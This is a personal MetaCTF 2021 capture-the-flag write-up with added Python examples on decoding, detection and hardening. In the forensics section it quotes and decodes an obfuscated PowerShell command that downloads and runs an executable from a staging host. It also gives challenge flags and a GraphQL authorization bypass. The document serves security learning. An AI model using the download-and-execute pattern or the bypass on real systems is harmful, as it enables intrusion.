Overview
This article is my write-up for MetaCTF 2021, which I took part in recently.
The event ran from Fri, 03 Dec 2021 20:00 UTC to Sun, 05 Dec 2021 20:00 UTC, and as usual I took part as a one-person team.
The result was 1375 points: 924th of 1950 teams overall, and 463rd of 913 teams in the Non-Student division.
For the challenges I solved I give my solution; for the ones I did not solve, I note the path I think leads to a solution.
I plan to add unsolved challenges and links to other people's write-ups as I go.
Solved Challenges
Binary Exploitation
None.
Needs review.
Cryptography
Thnks fr th Pwds (solved by 1126 teams, 100 points)
On a red team engagement, you discover a text file on an administrator’s desktop with all of their passwords - you now have the keys to the kingdom!
During the engagement debrief, you explain what you found and how you were able to access so many systems. The administrator says that's impossible, because they encrypted all of the passwords in the file.
Here’s an example of one of their “encrypted” passwords: TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ==
See if you’re able to recover the Administrator's password.
Just Base64-decode the "encrypted" password TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ== and the flag drops out:
MetaCTF{encoding_is_N0T_the_same_as_encryption!!}
Wrong Way on a One Way Street (solved by 1039 teams, 100 points)
Hashing is a system by which information is encrypted such that it can never be decrypted... theoretically. Websites will often hash passwords so that if their passwords are ever leaked, bad actors won't actually learn the user's password; they'll just get an encrypted form of it. However, the same password will always hash to the same ciphertext, so if the attacker can guess your password, they can figure out the hash. Can you guess the password for this hash? cb78e77e659c1648416cf5ac43fca4b65eeaefe1
I looked up the given hash value cb78e77e659c1648416cf5ac43fca4b65eeaefe1 to see whether anything matched, and a hit turned up immediately.
Search result - Best MD5 & SHA1 Password Decrypter | Hash Toolkit
babyloka13
References
- Hash Toolkit, a site for converting and reversing MD5 hashes - WEB制作の解決策FAQブログ
- Best MD5 & SHA1 Password Decrypter | Hash Toolkit | cb78e77e659c1648416cf5ac43fca4b65eeaefe1
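The lookup above works because an unsalted SHA-1 of a common password is the same everywhere, so a site only has to compute it once. As an added example (my own code, not part of the original write-up or of Hash Toolkit), the Python below reproduces that lookup over a small constructed wordlist and sets it beside the hardened form a site should use: a random per-user salt plus PBKDF2-HMAC-SHA256, verified in constant time. The wordlist, the record format and the function names are my own choices.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a lookup site's database of common passwords.
WORDLIST = ["123456", "password", "letmein", "qwerty", "babyloka13"]

def sha1_hex(text):
    return hashlib.sha1(text.encode("utf-8")).hexdigest()

def lookup_unsalted_sha1(target_hex, wordlist=WORDLIST):
    """What a reverse-lookup site does: compare the target against sha1() of known passwords.
    It works because unsalted SHA-1 maps the same password to the same digest everywhere."""
    target_hex = target_hex.strip().lower()
    for candidate in wordlist:
        if sha1_hex(candidate) == target_hex:
            return candidate
    return None

def hash_password(password, salt=None, iterations=600_000):
    """Hardened storage: random per-user salt plus PBKDF2-HMAC-SHA256.
    The salt defeats precomputed tables; the iteration count makes each guess expensive."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations), salt.hex(), dk.hex()])

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    digest = sha1_hex("babyloka13")
    print("unsalted sha1 lookup:", lookup_unsalted_sha1(digest))
    stored = hash_password("babyloka13")
    print("salted record:", stored)
    print("verify:", verify_password("babyloka13", stored))
```

With the salted record, two users with the same password get different stored values, and an attacker who obtains the database has to run the full PBKDF2 cost per guess per user instead of consulting a table.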
Forensics
There were several more challenges here that looked solvable, so I should have put a bit more effort into this category...
Magic in the Hex (solved by 1115 teams, 100 points)
Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it's helpful to look at some of the file format signatures to figure out what they are. We use something called "magic bytes" which are the first few bytes of a file.
What is the ASCII representation of the magic bytes for a VMDK file? The flag format will be 3-4 letters (there are two correct answers).
The ASCII representation of the magic bytes of a VMDK file is KDMV.
References
My Logs Know What You Did (solved by 997 teams, 125 points)
While investigating an incident, you identify a suspicious powershell command that was run on a compromised system ... can you figure out what it was doing?
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn
A PowerShell challenge. Are these becoming more common lately?
Base64-decoding the TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn part of the command line shows that it runs the following:
New-Object System.Net.WebClient).DownloadFile('http://MetaCTF{super_sus_st4ging_site_d0t_c0m}/_bad.exe','bad.exe');Start-Process 'bad.exe'
References
PowerShell Obfuscation Basics (3) - Binary Pulsar
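Both "Thnks fr th Pwds" and this challenge come down to Base64 decoding, so here is one added example (my own Python, not code from the write-up) that covers the two and adds the check an analyst actually needs: powershell.exe's -EncodedCommand expects UTF-16LE, whereas this challenge's payload is plain ASCII, so the decoder looks at the second byte to tell the two apart and falls back to UTF-8. The triage function then finds the -enc argument in a logged command line and pulls out the URLs and launched files. The two inputs are the strings from the challenge texts above; the function names and regular expressions are my own choices.

```python
import base64
import re

# Inputs copied from the two challenge texts above.
ENCRYPTED_PASSWORD = "TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ=="
POWERSHELL_CMDLINE = (
    r"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc "
    "TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntz"
    "dXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nl"
    "c3MgJ2JhZC5leGUn"
)

# -e, -ec, -en, -enc and -EncodedCommand are all accepted abbreviations (case-insensitive).
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")

def b64_decode_lenient(value):
    """Base64-decode, restoring the '=' padding that log pipelines often strip."""
    value = value.strip()
    return base64.b64decode(value + "=" * (-len(value) % 4))

def decode_powershell_encoded(value):
    """Return (text, encoding). powershell.exe itself expects UTF-16LE; this challenge's
    payload (and some hand-made loaders) use plain ASCII, so fall back to UTF-8."""
    raw = b64_decode_lenient(value)
    if len(raw) >= 2 and raw[1:2] == b"\x00":   # ASCII text in UTF-16LE has NUL high bytes
        try:
            return raw.decode("utf-16-le"), "utf-16-le"
        except UnicodeDecodeError:
            pass
    return raw.decode("utf-8", errors="replace"), "utf-8"

def encode_powershell(text):
    """Build an -EncodedCommand value the way PowerShell expects it (UTF-16LE, then Base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

def triage_cmdline(cmdline):
    """Find an encoded command in a logged command line, decode it, and extract the
    indicators an analyst wants first: remote URLs and files handed to Start-Process."""
    match = ENC_FLAG_RE.search(cmdline)
    if not match:
        return None
    text, encoding = decode_powershell_encoded(match.group(1))
    return {
        "encoding": encoding,
        "decoded": text,
        "urls": re.findall(r"""https?://[^\s'"()]+""", text),
        "launches": re.findall(r"Start-Process\s+'([^']+)'", text),
    }

if __name__ == "__main__":
    print(decode_powershell_encoded(ENCRYPTED_PASSWORD)[0])
    print(triage_cmdline(POWERSHELL_CMDLINE))
```

Run against the challenge command line, the triage reports encoding "utf-8", the staging URL and "bad.exe" as the launched file; a genuine -EncodedCommand produced by PowerShell (see encode_powershell) comes back as "utf-16-le".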
Sharing Files and Passwords (solved by 967 teams, 150 points)
FTP servers are made to share files, but if its communications are not encrypted, it might be sharing passwords as well. The password in this pcap to get the flag
Opening the distributed pcap file in Wireshark and following the FTP control connection shows the password the challenge asks for.
ftp_is_better_than_dropbox
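What Wireshark's "Follow TCP Stream" shows here is the FTP control channel in cleartext, which is also exactly what a network monitor can alert on. As an added example (my own Python, not part of the write-up), the function below walks a control-channel transcript, records every USER/PASS exchange and whether the server accepted it, and recognises the AUTH TLS upgrade after which the channel is encrypted and no credentials are visible. The two transcripts are constructed; the "C:"/"S:" line format and the function names are my own.

```python
# Constructed FTP control-channel transcripts in the shape Wireshark's "Follow TCP Stream"
# shows them: "C:" lines come from the client, "S:" lines from the server.
PLAINTEXT_SESSION = """\
S: 220 (constructed ftp banner)
C: USER alice
S: 331 Please specify the password.
C: PASS s3cret-constructed
S: 230 Login successful.
C: RETR flag.txt
S: 150 Opening BINARY mode data connection for flag.txt.
S: 226 Transfer complete.
C: QUIT
S: 221 Goodbye.
"""

FTPS_SESSION = """\
S: 220 (constructed ftp banner)
C: AUTH TLS
S: 234 Proceed with negotiation.
"""  # after the 234 reply the control channel is TLS-wrapped, so nothing further is readable

def analyze_ftp_control(stream):
    """Walk a control-channel transcript and report every cleartext login attempt.
    Returns {"tls_negotiated": bool, "logins": [{"user", "password", "success"}, ...]}."""
    tls = False
    user = None
    pending = None            # last client command that is waiting for a server reply
    logins = []
    for line in stream.splitlines():
        if len(line) < 3 or line[:3] not in ("C: ", "S: "):
            continue
        side, msg = line[0], line[3:].rstrip()
        if side == "C":
            cmd, _, arg = msg.partition(" ")
            cmd = cmd.upper()
            if cmd == "AUTH" and arg.upper() in ("TLS", "SSL"):
                pending = ("AUTH", arg)
            elif cmd == "USER":
                user = arg
                pending = None
            elif cmd == "PASS":
                pending = ("PASS", arg)
            else:
                pending = None
        else:
            code = msg[:3]
            if pending and pending[0] == "AUTH":
                tls = code == "234"
            elif pending and pending[0] == "PASS":
                logins.append({"user": user, "password": pending[1],
                               "success": code.startswith("2")})
            pending = None
    return {"tls_negotiated": tls, "logins": logins}

def format_alert(result):
    """Human-readable finding with the secret masked, suitable for a SOC ticket."""
    if result["tls_negotiated"]:
        return "control channel upgraded to TLS; credentials not exposed"
    return "; ".join(
        f"cleartext FTP login user={l['user']} pass={'*' * len(l['password'])} "
        f"({'accepted' if l['success'] else 'rejected'})"
        for l in result["logins"]
    ) or "no login observed"

if __name__ == "__main__":
    print(format_alert(analyze_ftp_control(PLAINTEXT_SESSION)))
    print(format_alert(analyze_ftp_control(FTPS_SESSION)))
```

The masked alert is the form to forward; the mitigation the challenge text hints at is the second transcript: require AUTH TLS (or SFTP) so the PASS command never crosses the wire in the clear.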
Still Believe in Magic? (solved by 924 teams, 150 points)
We found an archive with a file in it, but there was no file extension so we're not sure what it is. Can you figure out what kind of file it is and then open it?
Extracting the distributed archive produced a mysterious file called magic, with no extension.
Checking it with the file command shows that it is a zip file:
# file magic
magic: Zip archive data, at least v2.0 to extract, compression method=deflate
So running unzip on magic produced magic.txt, which contained the flag:
MetaCTF{was_it_a_magic_trick_or_magic_bytes?}
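Both "Magic in the Hex" and this challenge rest on the same idea: the first bytes of a file identify its format no matter what the name or extension says. As an added example (my own Python, not code from the write-up or from the file utility), the block below keeps a small signature table, renders the leading bytes as ASCII the way a hex editor does (which is where the KDMV answer comes from), identifies a buffer by its magic, and, for a zip, lists the members the way unzip would. The table is a constructed subset of well-known signatures, and the sample archive is built in memory; the function names are my own.

```python
import io
import zipfile

# Small signature table constructed for this example (a subset of what `file` knows):
# (offset, magic bytes, description).
SIGNATURES = [
    (0, b"PK\x03\x04", "Zip archive data"),
    (0, b"PK\x05\x06", "Zip archive data (empty)"),
    (0, b"KDMV", "VMware VMDK sparse extent"),
    (0, b"# Disk DescriptorFile", "VMware VMDK descriptor (text)"),
    (0, b"\x7fELF", "ELF executable"),
    (0, b"MZ", "DOS/Windows PE executable"),
    (0, b"\x89PNG\r\n\x1a\n", "PNG image"),
    (0, b"%PDF-", "PDF document"),
    (0, b"\x1f\x8b", "gzip compressed data"),
]

def ascii_magic(data, n=4):
    """Render the first n bytes the way hex editors show them: printable ASCII or '.'."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data[:n])

def identify(data):
    """Match the leading bytes against the table, longest signature first; 'data' if unknown."""
    for offset, magic, desc in sorted(SIGNATURES, key=lambda s: len(s[1]), reverse=True):
        if data[offset:offset + len(magic)] == magic:
            return desc
    return "data"

def build_sample_archive():
    """Construct an extension-less zip in memory, shaped like the challenge's 'magic' file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("magic.txt", "constructed sample content, not the real flag\n")
    return buf.getvalue()

def inspect(data):
    """Identify by magic bytes regardless of file name, and list members if it is a zip."""
    report = {"type": identify(data), "magic_ascii": ascii_magic(data)}
    if report["type"].startswith("Zip archive") and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            report["members"] = zf.namelist()
    return report

if __name__ == "__main__":
    for sample in (build_sample_archive(), b"KDMV\x01\x00\x00\x00", b"\x00\x00garbage"):
        print(inspect(sample))
```

The longest-signature-first ordering matters once the table grows: a two-byte prefix such as MZ must not shadow a longer signature that happens to share it, and anything that matches nothing is reported as plain data rather than guessed.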
Reconnaissance
None.
A format I ran into for the first time.
Reconnaissance? I knew about MITRE ATT&CK, but I could not get to the correct answer...
Needs review.
Reverse Engineering
There Are No Strings on Me (solved by 1034 teams, 100 points)
We've got this program that's supposed to check a password, and we're not quite sure how it works. Could you take a look at it and see about finding the password it's looking for?
download
Running it under ltrace showed the password right away.
# ltrace -s 100 ./strings
printf("Input the password: ") = 20
fgets(Input the password: 1234
"1234\n", 256, 0x7f472bb619a0) = 0x7fff6a210350
strcmp("1234\n", "MetaCTF{this_is_the_most_secure_ever}\n") = -28
puts("Begone!!"Begone!!
) = 9
+++ exited (status 0) +++
Web Exploitation
Under Inspection (solved by 1113 teams, 100 points)
Someone made this site for the Autobots to chat with each other. Seems like the Decepticons have found the site too and made accounts.
One of the Autobot accounts has a flag that they're trying to keep hidden from the Decepticons, can you figure out which account it is and steal it?
Visiting the site given in the challenge text redirects to a login page.
I logged in with arbitrary credentials and watched the traffic in Burp, but no request was sent at login time...?
Looking at the page source, the ID and password were written directly into it, and the flag is shown only when both match.
Welcome, Jazz. The flag is MetaCTF{do_it_with_style_or_dont_do_it_at_all}
Looking Inwards (solved by 180 teams, 300 points)
It's always fun to take a moment of introspection, in this case not about oneself, but about our field (development/security). For example when it comes to API design, first there were SOAP endpoints primarily based on XML. Then as Web 2.0 came along, RESTful APIs became all the rage. Recently, technologies like GraphQL began to gain traction.
With new technologies, though, come new classes of attacks. Check out this basic GraphQL API server. To get you started, here's one cool thing it can do: If you send it a query in the form of echo(message: "message_here"), it will respond with what you said. Can you get it to give you the flag?
A GraphQL challenge.
First, pull the schema from the challenge URL with get-graphql-schema:
# get-graphql-schema https://metaproblems.com/bb0e56b64e0a17b47450457b07fd2353/graphql.php
type Mutation {
sum(x: Int!, y: Int!): Int!
}
type Query {
echo(message: String!): String!
super_super_secret_flag_dispenser(authorized: Boolean!): String!
}
Following the example in the challenge text, querying super_super_secret_flag_dispenser returns the flag:
{"data":{"super_super_secret_flag_dispenser":"MetaCTF{look_deep_and_who_knows_what_you_might_find}"}}
References
My own write-up - SECCON Beginners CTF 2020 Write Up - Qiita
SECCON Beginners 2020 Writeup (profiler, Somen) - Ryoto's Blog
SECCON Beginner CTF 2020 Web Complete Walkthrough - はまやんはまやんはまやん (https://blog.hamayanhamayan.com/entry/2020/05/25/131102)
GitHub - prisma-labs/get-graphql-schema: Fetch and print the GraphQL schema from a GraphQL HTTP endpoint. (Can be used for Relay Modern.)
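get-graphql-schema works by sending the standard introspection query and printing the result as SDL, and the interesting field here was found purely by reading that output. As an added example (my own Python, not code from the write-up or from get-graphql-schema), the block below carries the introspection query, renders a constructed introspection response into the same SDL shown above, and then runs the review check this challenge teaches: any root field whose argument lets the caller assert its own authorization (here authorized: Boolean!) is a finding, because authorization has to come from server-side context (session, token), never from a client-supplied argument. The sample response is constructed to mirror the challenge schema; the argument-name pattern and function names are my own choices.

```python
import re

# The standard introspection query (what tools like get-graphql-schema send), trimmed
# to the parts this example needs.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      kind name
      fields { name args { name type { ...TypeRef } } type { ...TypeRef } }
    }
  }
}
fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name } } }
"""

def _nn(name):
    """Build a NON_NULL scalar type reference for the constructed response."""
    return {"kind": "NON_NULL", "name": None,
            "ofType": {"kind": "SCALAR", "name": name, "ofType": None}}

# Constructed introspection response shaped like the challenge schema shown above.
SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "echo", "args": [{"name": "message", "type": _nn("String")}],
             "type": _nn("String")},
            {"name": "super_super_secret_flag_dispenser",
             "args": [{"name": "authorized", "type": _nn("Boolean")}], "type": _nn("String")},
        ]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "sum", "args": [{"name": "x", "type": _nn("Int")},
                                     {"name": "y", "type": _nn("Int")}], "type": _nn("Int")},
        ]},
        {"kind": "SCALAR", "name": "String", "fields": None},
        {"kind": "SCALAR", "name": "Int", "fields": None},
        {"kind": "SCALAR", "name": "Boolean", "fields": None},
    ],
}}}

def render_type(t):
    """Turn a TypeRef tree back into SDL notation, e.g. String! or [Int!]."""
    if t["kind"] == "NON_NULL":
        return render_type(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + render_type(t["ofType"]) + "]"
    return t["name"]

def render_sdl(response):
    """Print object types as SDL, which is roughly what get-graphql-schema outputs."""
    schema = response["data"]["__schema"]
    lines = []
    for t in sorted(schema["types"], key=lambda x: x["name"]):
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        lines.append(f"type {t['name']} {{")
        for f in t["fields"]:
            args = ", ".join(f"{a['name']}: {render_type(a['type'])}" for a in f["args"])
            sig = "(" + args + ")" if args else ""
            lines.append(f"  {f['name']}{sig}: {render_type(f['type'])}")
        lines.append("}")
    return "\n".join(lines)

# Argument names that suggest the client is being asked to assert its own privileges.
AUTH_ARG_RE = re.compile(r"(?i)^(is_?)?(authori[sz]ed|admin|role|privileged|internal)$")

def audit_client_controlled_auth(response):
    """Flag root-type fields whose arguments let the caller claim authorization."""
    schema = response["data"]["__schema"]
    roots = {schema["queryType"]["name"]}
    if schema.get("mutationType"):
        roots.add(schema["mutationType"]["name"])
    findings = []
    for t in schema["types"]:
        if t["name"] not in roots or not t.get("fields"):
            continue
        for f in t["fields"]:
            for a in f["args"]:
                if AUTH_ARG_RE.match(a["name"]):
                    findings.append(f"{t['name']}.{f['name']}({a['name']}: {render_type(a['type'])})")
    return findings

if __name__ == "__main__":
    print(render_sdl(SAMPLE_RESPONSE))
    print("client-controlled authorization args:", audit_client_controlled_auth(SAMPLE_RESPONSE))
```

Two fixes follow from the finding: resolve the flag field from the request's authenticated context rather than from an argument, and disable introspection on production endpoints so the schema is not handed to anyone who asks (which hides the field but does not fix it).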
Other
Apart from the challenges I solved, I did not even read the descriptions of the others...
I need to think properly about how I allocate my time...
Flag Format (solved by 1264 teams, 50 points)
Most of our flags are formatted like this: MetaCTF{string_separated_with_und3rscores}
If the flag is not in that format, we specify what the flag format should be instead. If you solve this challenge, make sure to tell your teammates about the flag format!
A welcome challenge.
The flag format for this CTF is MetaCTF{string_separated_with_und3rscores}
This Ain't a Scene, It's an Encryption Race (solved by 1075 teams, 100 points)
Ransomware attacks continue to negatively impact businesses around the world. What is the Mitre ATT&CK technique ID for the encryption of data in an environment to disrupt business operations?
The flag format will be T####.
A question about MITRE ATT&CK.
The technique matching the description is T1486.
References
Unsolved Challenges
Web Exploitation
WAS my flag? Part I (solved by 111 teams, 250 points)
Leaky Logs (solved by 133 teams, 300 points)
Yummy Vegetables (solved by 205 teams, 300 points)
Custom Blog (solved by 86 teams, 350 points)
Web Inspection (solved by 46 teams, 375 points)
Look, if you had one shot (solved by 30 teams, 400 points)
WAS my flag? Part II (solved by 33 teams, 475 points)
Other
Impressions
Lately my motivation for CTFs has been high and I have been joining a lot of them, but I cannot keep up with writing the write-ups...
I also want to do TryHackMe, and I have other hobbies and job hunting to attend to, but I am short enough on time that I keep falling behind...
I am looking for work.
Links to other people's write-ups
Once a fair number have accumulated, I plan to post them as a separate article. (2021/05/25)